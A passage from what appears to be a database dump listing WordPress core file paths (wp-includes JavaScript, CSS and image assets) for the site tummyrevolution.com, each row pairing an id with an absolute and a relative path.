yrevolution.com/wp-includes/js/dist/nux.min.js','wp-includes/js/dist/nux.min.js'),(15798,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/patterns.js','wp-includes/js/dist/patterns.js'),(15799,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/patterns.min.js','wp-includes/js/dist/patterns.min.js'),(15800,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/plugins.js','wp-includes/js/dist/plugins.js'),(15801,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/plugins.min.js','wp-includes/js/dist/plugins.min.js'),(15802,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences-persistence.js','wp-includes/js/dist/preferences-persistence.js'),(15803,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences-persistence.min.js','wp-includes/js/dist/preferences-persistence.min.js'),(15804,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences.js','wp-includes/js/dist/preferences.js'),(15805,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/preferences.min.js','wp-includes/js/dist/preferences.min.js'),(15806,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/primitives.js','wp-includes/js/dist/primitives.js'),(15807,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/primitives.min.js','wp-includes/js/dist/primitives.min.js'),(15808,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/priority-queue.js','wp-includes/js/dist/priority-queue.js'),(15809,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/priority-queue.min.js','wp-includes/js/dist/priority-queue.min.js'),(15810,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/private-apis.js','wp-includes/js/dist/private-apis.js'),(15811,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/private-apis.min.js','wp-includes/js/dist/private-apis.min.js'),(15812,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/redux-routine.js','wp-includes/js/dist/redux-routine.js'),(15813,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/redux-routine.min.js','wp-includes/js/dist/redux-routine.min.js'),(15814,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/reusable-blocks.js','wp-includes/js/dist/reusable-blocks.js'),(15815,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/reusable-blocks.min.js','wp-includes/js/dist/reusable-blocks.min.js'),(15816,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/rich-text.js','wp-includes/js/dist/rich-text.js'),(15817,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/rich-text.min.js','wp-includes/js/dist/rich-text.min.js'),(15818,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/router.js','wp-includes/js/dist/router.js'),(15819,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/router.min.js','wp-includes/js/dist/router.min.js'),(15820,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/server-side-render.js','wp-includes/js/dist/server-side-render.js'),(15821,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/server-side-render.min.js','wp-includes/js/dist/server-side-render.min.js'),(15822,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/shortcode.js','wp-includes/js/dist/shortcode.js'),(15823,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/shortcode.min.js','wp-includes/js/dist/shortcode.min.js'),(15824,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/style-engine.js','wp-includes/js/dist/style-engine.js'),(15825,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/style-engine.min.js','wp-includes/js/dist/style-engine.min.js'),(15826,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/token-list.js','wp-includes/js/dist/token-list.js'),(15827,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/token-list.min.js','wp-includes/js/dist/token-list.min.js'),(15828,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/undo-manager.js','wp-includes/js/dist/undo-manager.js'),(15829,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/undo-manager.min.js','wp-includes/js/dist/undo-manager.min.js'),(15830,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/url.js','wp-includes/js/dist/url.js'),(15831,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/url.min.js','wp-includes/js/dist/url.min.js'),(15832,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/lodash.js','wp-includes/js/dist/vendor/lodash.js'),(15833,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/lodash.min.js','wp-includes/js/dist/vendor/lodash.min.js'),(15834,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/moment.js','wp-includes/js/dist/vendor/moment.js'),(15835,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/moment.min.js','wp-includes/js/dist/vendor/moment.min.js'),(15836,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/react-dom.js','wp-includes/js/dist/vendor/react-dom.js'),(15837,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/react-dom.min.js','wp-includes/js/dist/vendor/react-dom.min.js'),(15838,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/react.js','wp-includes/js/dist/vendor/react.js'),(15839,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/react.min.js','wp-includes/js/dist/vendor/react.min.js'),(15840,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/regenerator-runtime.js','wp-includes/js/dist/vendor/regenerator-runtime.js'),(15841,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js','wp-includes/js/dist/vendor/regenerator-runtime.min.js'),(15842,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js'),(15843,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js'),(15844,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),(15845,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),(15846,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.js','wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),(15847,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),(15848,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.js','wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),(15849,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),(15850,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-inert.js','wp-includes/js/dist/vendor/wp-polyfill-inert.js'),(15851,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js','wp-includes/js/dist/vendor/wp-polyfill-inert.min.js'),(15852,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),(15853,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),(15854,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js'),(15855,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js'),(15856,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-url.js','wp-includes/js/dist/vendor/wp-polyfill-url.js'),(15857,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill-url.min.js','wp-includes/js/dist/vendor/wp-polyfill-url.min.js'),(15858,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill.js','wp-includes/js/dist/vendor/wp-polyfill.js'),(15859,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/vendor/wp-polyfill.min.js','wp-includes/js/dist/vendor/wp-polyfill.min.js'),(15860,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/viewport.js','wp-includes/js/dist/viewport.js'),(15861,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/viewport.min.js','wp-includes/js/dist/viewport.min.js'),(15862,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/warning.js','wp-includes/js/dist/warning.js'),(15863,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/warning.min.js','wp-includes/js/dist/warning.min.js'),(15864,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/widgets.js','wp-includes/js/dist/widgets.js'),(15865,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/widgets.min.js','wp-includes/js/dist/widgets.min.js'),(15866,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/wordcount.js','wp-includes/js/dist/wordcount.js'),(15867,'/home/tummmyov/tummyrevolution.com/wp-includes/js/dist/wordcount.min.js','wp-includes/js/dist/wordcount.min.js'),(15868,'/home/tummmyov/tummyrevolution.com/wp-includes/js/heartbeat.js','wp-includes/js/heartbeat.js'),(15869,'/home/tummmyov/tummyrevolution.com/wp-includes/js/heartbeat.min.js','wp-includes/js/heartbeat.min.js'),(15870,'/home/tummmyov/tummyrevolution.com/wp-includes/js/hoverIntent.js','wp-includes/js/hoverIntent.js'),(15871,'/home/tummmyov/tummyrevolution.com/wp-includes/js/hoverIntent.min.js','wp-includes/js/hoverIntent.min.js'),(15872,'/home/tummmyov/tummyrevolution.com/wp-includes/js/hoverintent-js.min.js','wp-includes/js/hoverintent-js.min.js'),(15873,'/home/tummmyov/tummyrevolution.com/wp-includes/js/imagesloaded.min.js','wp-includes/js/imagesloaded.min.js'),(15874,'/home/tummmyov/tummyrevolution.com/wp-includes/js/imgareaselect/border-anim-h.gif','wp-includes/js/imgareaselect/border-anim-h.gif'),(15875,'/home/tummmyov/tummyrevolution.com/wp-includes/js/imgareaselect/border-anim-v.gif','wp-includes/js/imgareaselect/border-anim-v.gif'),(15876,'/home/tummmyov/tummyrevolution.com/wp-includes/js/imgareaselect/imgareaselect.css','wp-includes/js/imgareaselect/imgareaselect.css'),(15877,'/home/tummmyov/tummyrevolution.com/wp-includes/js/imgareaselect/jquery.imgareaselect.js','wp-includes/js/imgareaselect/jquery.imgareaselect.js'),(15878,'/home/tummmyov/tummyrevolution.com/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),(15879,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jcrop/Jcrop.gif','wp-includes/js/jcrop/Jcrop.gif'),(15880,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jcrop/jquery.Jcrop.min.css','wp-includes/js/jcrop/jquery.Jcrop.min.css'),(15881,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jcrop/jquery.Jcrop.min.js','wp-includes/js/jcrop/jquery.Jcrop.min.js'),(15882,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery-migrate.js','wp-includes/js/jquery/jquery-migrate.js'),(15883,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery-migrate.min.js','wp-includes/js/jquery/jquery-migrate.min.js'),(15884,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.color.min.js','wp-includes/js/jquery/jquery.color.min.js'),(15885,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.form.js','wp-includes/js/jquery/jquery.form.js'),(15886,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.form.min.js','wp-includes/js/jquery/jquery.form.min.js'),(15887,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.hotkeys.js','wp-includes/js/jquery/jquery.hotkeys.js'),(15888,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.hotkeys.min.js','wp-includes/js/jquery/jquery.hotkeys.min.js'),(15889,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.js','wp-includes/js/jquery/jquery.js'),(15890,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.masonry.min.js','wp-includes/js/jquery/jquery.masonry.min.js'),(15891,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.min.js','wp-includes/js/jquery/jquery.min.js'),(15892,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.query.js','wp-includes/js/jquery/jquery.query.js'),(15893,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.schedule.js','wp-includes/js/jquery/jquery.schedule.js'),(15894,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.serialize-object.js','wp-includes/js/jquery/jquery.serialize-object.js'),(15895,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.table-hotkeys.js','wp-includes/js/jquery/jquery.table-hotkeys.js'),(15896,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.table-hotkeys.min.js','wp-includes/js/jquery/jquery.table-hotkeys.min.js'),(15897,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/jquery.ui.touch-punch.js','wp-includes/js/jquery/jquery.ui.touch-punch.js'),(15898,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/suggest.js','wp-includes/js/jquery/suggest.js'),(15899,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/suggest.min.js','wp-includes/js/jquery/suggest.min.js'),(15900,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/accordion.js','wp-includes/js/jquery/ui/accordion.js'),(15901,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/accordion.min.js','wp-includes/js/jquery/ui/accordion.min.js'),(15902,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/autocomplete.js','wp-includes/js/jquery/ui/autocomplete.js'),(15903,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/autocomplete.min.js','wp-includes/js/jquery/ui/autocomplete.min.js'),(15904,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/button.js','wp-includes/js/jquery/ui/button.js'),(15905,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/button.min.js','wp-includes/js/jquery/ui/button.min.js'),(15906,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/checkboxradio.js','wp-includes/js/jquery/ui/checkboxradio.js'),(15907,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/checkboxradio.min.js','wp-includes/js/jquery/ui/checkboxradio.min.js'),(15908,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/controlgroup.js','wp-includes/js/jquery/ui/controlgroup.js'),(15909,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/controlgroup.min.js','wp-includes/js/jquery/ui/controlgroup.min.js'),(15910,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/core.js','wp-includes/js/jquery/ui/core.js'),(15911,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/core.min.js','wp-includes/js/jquery/ui/core.min.js'),(15912,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/datepicker.js','wp-includes/js/jquery/ui/datepicker.js'),(15913,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/datepicker.min.js','wp-includes/js/jquery/ui/datepicker.min.js'),(15914,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/dialog.js','wp-includes/js/jquery/ui/dialog.js'),(15915,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/dialog.min.js','wp-includes/js/jquery/ui/dialog.min.js'),(15916,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/draggable.js','wp-includes/js/jquery/ui/draggable.js'),(15917,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/draggable.min.js','wp-includes/js/jquery/ui/draggable.min.js'),(15918,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/droppable.js','wp-includes/js/jquery/ui/droppable.js'),(15919,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/droppable.min.js','wp-includes/js/jquery/ui/droppable.min.js'),(15920,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-blind.js','wp-includes/js/jquery/ui/effect-blind.js'),(15921,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-blind.min.js','wp-includes/js/jquery/ui/effect-blind.min.js'),(15922,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-bounce.js','wp-includes/js/jquery/ui/effect-bounce.js'),(15923,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-bounce.min.js','wp-includes/js/jquery/ui/effect-bounce.min.js'),(15924,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-clip.js','wp-includes/js/jquery/ui/effect-clip.js'),(15925,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-clip.min.js','wp-includes/js/jquery/ui/effect-clip.min.js'),(15926,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-drop.js','wp-includes/js/jquery/ui/effect-drop.js'),(15927,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-drop.min.js','wp-includes/js/jquery/ui/effect-drop.min.js'),(15928,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-explode.js','wp-includes/js/jquery/ui/effect-explode.js'),(15929,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-explode.min.js','wp-includes/js/jquery/ui/effect-explode.min.js'),(15930,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-fade.js','wp-includes/js/jquery/ui/effect-fade.js'),(15931,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-fade.min.js','wp-includes/js/jquery/ui/effect-fade.min.js'),(15932,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-fold.js','wp-includes/js/jquery/ui/effect-fold.js'),(15933,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-fold.min.js','wp-includes/js/jquery/ui/effect-fold.min.js'),(15934,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-highlight.js','wp-includes/js/jquery/ui/effect-highlight.js'),(15935,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-highlight.min.js','wp-includes/js/jquery/ui/effect-highlight.min.js'),(15936,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-puff.js','wp-includes/js/jquery/ui/effect-puff.js'),(15937,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-puff.min.js','wp-includes/js/jquery/ui/effect-puff.min.js'),(15938,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-pulsate.js','wp-includes/js/jquery/ui/effect-pulsate.js'),(15939,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-pulsate.min.js','wp-includes/js/jquery/ui/effect-pulsate.min.js'),(15940,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-scale.js','wp-includes/js/jquery/ui/effect-scale.js'),(15941,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-scale.min.js','wp-includes/js/jquery/ui/effect-scale.min.js'),(15942,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-shake.js','wp-includes/js/jquery/ui/effect-shake.js'),(15943,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-shake.min.js','wp-includes/js/jquery/ui/effect-shake.min.js'),(15944,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-size.js','wp-includes/js/jquery/ui/effect-size.js'),(15945,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-size.min.js','wp-includes/js/jquery/ui/effect-size.min.js'),(15946,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-slide.js','wp-includes/js/jquery/ui/effect-slide.js'),(15947,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-slide.min.js','wp-includes/js/jquery/ui/effect-slide.min.js'),(15948,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-transfer.js','wp-includes/js/jquery/ui/effect-transfer.js'),(15949,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect-transfer.min.js','wp-includes/js/jquery/ui/effect-transfer.min.js'),(15950,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect.js','wp-includes/js/jquery/ui/effect.js'),(15951,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/effect.min.js','wp-includes/js/jquery/ui/effect.min.js'),(15952,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/menu.js','wp-includes/js/jquery/ui/menu.js'),(15953,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/menu.min.js','wp-includes/js/jquery/ui/menu.min.js'),(15954,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/mouse.js','wp-includes/js/jquery/ui/mouse.js'),(15955,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/mouse.min.js','wp-includes/js/jquery/ui/mouse.min.js'),(15956,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/progressbar.js','wp-includes/js/jquery/ui/progressbar.js'),(15957,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/progressbar.min.js','wp-includes/js/jquery/ui/progressbar.min.js'),(15958,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/resizable.js','wp-includes/js/jquery/ui/resizable.js'),(15959,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/resizable.min.js','wp-includes/js/jquery/ui/resizable.min.js'),(15960,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/selectable.js','wp-includes/js/jquery/ui/selectable.js'),(15961,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/selectable.min.js','wp-includes/js/jquery/ui/selectable.min.js'),(15962,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/selectmenu.js','wp-includes/js/jquery/ui/selectmenu.js'),(15963,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/selectmenu.min.js','wp-includes/js/jquery/ui/selectmenu.min.js'),(15964,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/slider.js','wp-includes/js/jquery/ui/slider.js'),(15965,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/slider.min.js','wp-includes/js/jquery/ui/slider.min.js'),(15966,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/sortable.js','wp-includes/js/jquery/ui/sortable.js'),(15967,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/sortable.min.js','wp-includes/js/jquery/ui/sortable.min.js'),(15968,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/spinner.js','wp-includes/js/jquery/ui/spinner.js'),(15969,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/spinner.min.js','wp-includes/js/jquery/ui/spinner.min.js'),(15970,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/tabs.js','wp-includes/js/jquery/ui/tabs.js'),(15971,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/tabs.min.js','wp-includes/js/jquery/ui/tabs.min.js'),(15972,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/tooltip.js','wp-includes/js/jquery/ui/tooltip.js'),(15973,'/home/tummmyov/tummyrevolution.com/wp-includes/js/jquery/ui/tooltip.min.js','wp-includes/js/jquery/ui/tooltip.min.js'),(15974,'/home/tummmyov/tummyrevolution.com/wp-includes/js/json2.js','wp-includes/js/json2.js'),(15975,'/home/tummmyov/tummyrevolution.com/wp-includes/js/json2.min.js','wp-includes/js/json2.min.js'),(15976,'/home/tummmyov/tummyrevolution.com/wp-includes/js/masonry.min.js','wp-includes/js/masonry.min.js'),(15977,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mce-view.js','wp-includes/js/mce-view.js'),(15978,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mce-view.min.js','wp-includes/js/mce-view.min.js'),(15979,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-audiovideo.js','wp-includes/js/media-audiovideo.js'),(15980,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-audiovideo.min.js','wp-includes/js/media-audiovideo.min.js'),(15981,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-editor.js','wp-includes/js/media-editor.js'),(15982,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-editor.min.js','wp-includes/js/media-editor.min.js'),(15983,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-grid.js','wp-includes/js/media-grid.js'),(15984,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-grid.min.js','wp-includes/js/media-grid.min.js'),(15985,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-models.js','wp-includes/js/media-models.js'),(15986,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-models.min.js','wp-includes/js/media-models.min.js'),(15987,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-views.js','wp-includes/js/media-views.js'),(15988,'/home/tummmyov/tummyrevolution.com/wp-includes/js/media-views.min.js','wp-includes/js/media-views.min.js'),(15989,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelement-and-player.js','wp-includes/js/mediaelement/mediaelement-and-player.js'),(15990,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js','wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(15991,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelement-migrate.js','wp-includes/js/mediaelement/mediaelement-migrate.js'),(15992,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js','wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(15993,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelement.js','wp-includes/js/mediaelement/mediaelement.js'),(15994,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelement.min.js','wp-includes/js/mediaelement/mediaelement.min.js'),(15995,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.css','wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(15996,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(15997,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelementplayer.css','wp-includes/js/mediaelement/mediaelementplayer.css'),(15998,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mediaelementplayer.min.css','wp-includes/js/mediaelement/mediaelementplayer.min.css'),(15999,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mejs-controls.png','wp-includes/js/mediaelement/mejs-controls.png'),(16000,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/mejs-controls.svg','wp-includes/js/mediaelement/mejs-controls.svg'),(16001,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/renderers/vimeo.js','wp-includes/js/mediaelement/renderers/vimeo.js'),(16002,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/renderers/vimeo.min.js','wp-includes/js/mediaelement/renderers/vimeo.min.js'),(16003,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/wp-mediaelement.css','wp-includes/js/mediaelement/wp-mediaelement.css'),(16004,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/wp-mediaelement.js','wp-includes/js/mediaelement/wp-mediaelement.js'),(16005,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/wp-mediaelement.min.css','wp-includes/js/mediaelement/wp-mediaelement.min.css'),(16006,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/wp-mediaelement.min.js','wp-includes/js/mediaelement/wp-mediaelement.min.js'),(16007,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/wp-playlist.js','wp-includes/js/mediaelement/wp-playlist.js'),(16008,'/home/tummmyov/tummyrevolution.com/wp-includes/js/mediaelement/wp-playlist.min.js','wp-includes/js/mediaelement/wp-playlist.min.js'),(16009,'/home/tummmyov/tummyrevolution.com/wp-includes/js/plupload/handlers.js','wp-includes/js/plupload/handlers.js'),(16010,'/home/tummmyov/tummyrevolution.com/wp-includes/js/plupload/handlers.min.js','wp-includes/js/plupload/handlers.min.js'),(16011,'/home/tummmyov/tummyrevolution.com/wp-includes/js/plupload/license.txt','wp-includes/js/plupload/license.txt'),(16012,'/home/tummmyov/tummyrevolution.com/w